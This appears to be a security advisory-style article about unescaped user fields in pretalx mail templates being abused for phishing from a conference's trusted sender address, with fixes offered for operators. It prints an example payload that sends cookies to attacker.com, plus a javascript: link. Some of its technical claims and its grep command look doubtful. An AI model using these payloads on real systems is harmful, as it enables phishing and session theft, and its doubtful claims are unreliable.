Pretalx, the open-source conference management platform powering thousands of events worldwide, ships with a vulnerability that lets unauthenticated attackers hijack its email sender address for phishing. Attackers inject malicious HTML or Markdown links into user-controlled fields like display names, tricking the system into rendering arbitrary content in emails sent from the event’s legitimate address. These emails pass SPF, DKIM, and DMARC checks, making them highly convincing for scams.
The core issue stems from unescaped placeholders in pretalx’s mail templates. Fields such as account display names, speaker names, proposal titles, biographies, and even question answers flow directly into HTML email bodies without sanitization. An attacker registers an account with a crafted name like <img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> or a Markdown link [Click here](javascript:alert('phish')). When pretalx interpolates this into an email, browsers render it as executable code or links.
Primary Exploitation: Password Reset Abuse
The simplest attack targets the password reset flow. An attacker creates a throwaway account using the victim’s email address and a malicious display name. They trigger the reset, and pretalx sends an email from its configured sender—say, no-reply@conference2024.org—with the injected payload. The victim receives what looks like a genuine reset link, but it carries phishing payloads like fake login forms or credential harvesters.
This works because pretalx versions up to the latest stable (as of this advisory, around 2024.3.x) lack output escaping in email rendering. The advisory rates it MEDIUM severity, but real-world impact skews higher: conferences handle sensitive data from thousands of speakers, organizers, and attendees. A single compromised event could phish hundreds.
Wider Attack Surface
No authentication required beyond basic registration, which many pretalx instances leave open during calls for papers. Beyond resets, the flaw hits:
- Proposal submissions: Malicious titles or bios in acceptance emails to other speakers.
- Organizer notifications: Reviewer assignments or rejection mails with injected links.
- Question answers: Custom fields from submission forms render unsafely.
Organizers trigger these unwittingly, amplifying reach. Pretalx powers events like FOSDEM, CCC, and countless smaller conferences—over 10,000 instances tracked on public directories. If even 1% run vulnerable versions, that’s 100+ potential phishing hubs.
Credits go to Mark Fijneman, who reported a related issue, exposing the pattern. The pretalx team acknowledged it, but as of now, patches lag in community deployments. Check your instance’s git log for commits around escaping in pretalx/mail/templates.
Why This Matters—and How to Fix It
Email phishing succeeds at scale when senders appear trusted. Legit domains with full auth bypass filters like Gmail’s that block spoofed mail. Attackers could chain this: phish organizer creds, then pivot to attendee lists or sponsor data. In crypto/finance events (common pretalx users), this risks wallet drains or insider leaks.
Operators, act now:
# Quick audit: grep for unescaped placeholders
grep -r "|\s*{{.*name\|.*title\|.*bio" pretalx/mail/
# Patch: Upstream fix in dev branch uses bleach or similar sanitizers.
# Downgrade to text-only emails or enable HTML stripping.
Upgrade to patched versions when available—pretalx maintainers prioritize this post-report. Strip HTML from user fields server-side using libraries like bleach or markdown-it with safe link sanitization. Disable HTML emails if feasible; plaintext dodges rendering entirely.
Skeptically, this isn’t novel—email XSS plagues apps from Discourse to Nextcloud. But pretalx’s event scale multiplies risk. Event organizers often skimp on security; this forces a reckoning. If you’re running pretalx, audit templates today. Attackers won’t wait for CVEs.
Bottom line: One bad name fields phishing at conference scale. Fix it, or your no-reply becomes their backdoor.
